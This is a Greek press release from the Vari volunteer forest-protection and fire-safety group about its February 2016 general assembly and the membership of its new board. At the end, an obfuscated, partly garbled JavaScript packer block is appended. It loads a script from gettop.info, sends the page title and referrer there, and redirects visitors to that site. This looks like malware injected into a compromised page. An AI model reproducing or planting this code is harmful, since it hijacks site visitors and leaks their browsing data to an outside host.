Αρχείο

dasopro_varis_logo_middle

ΕΘΕΛΟΝΤΙΚΗ ΟΜΑΔΑ
ΔΑΣΟΠΡΟΣΤΑΣΙΑΣ ΚΑΙ ΠΥΡΑΣΦΑΛΕΙΑΣ ΒΑΡΗΣ
Α.Μ. Γ.Γ.Π.Π. : 48/2008
Παλαιό Γήπεδο Ποδοσφαίρου, Παραλία Βάρκιζας
ΤΚ: 16672, ΒΑΡΗ
Τ: 210 9655 668 Βάρη, 11 Μαρτίου 2016
F: 210 8970 470
e-mail: pyrasfaliavaris@gmail.com
www.dasoprostasiavaris.gr

Αρ. Πρωτ.: 38 /2016

ΔΕΛΤΙΟ ΤΥΠΟΥ

Την Κυριακή 28/02/2016 πραγματοποιήθηκε η Γενική Συνέλευση της Εθελοντικής Ομάδας Δασοπροστασίας & Πυρασφάλειας της Δ.Ε. Βάρης, με μεγάλη συμμετοχή εθελοντών της περιοχής μας.

Η Γενική Συνέλευση συζήτησε τον απολογισμό, ενέκρινε τον προγραμματισμό δράσης της Ομάδας για το έτος 2016 και εξέλεξε πενταμελή Διοικούσα Επιτροπή.

Η Διοικούσα Επιτροπή στη πρώτη συνεδρίαση της στις 10/03/2016, συγκροτήθηκε σε σώμα ως ακολούθως :

1. Σαμαράς Ανδρέας Επικεφαλής
2. Κατούνα Ελένη Μέλος
3. Σαμαράς Στυλιανός Μέλος
4. Τσίλος Θεόδωρος Μέλος
5. Γραμματικός Γεώργιος Μέλος

Αναπληρωματικά μέλη :

1. Ταξίδης Χαράλαμπος
2. Μπαλοδήμος Γρηγόριος

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!».replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{})) setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);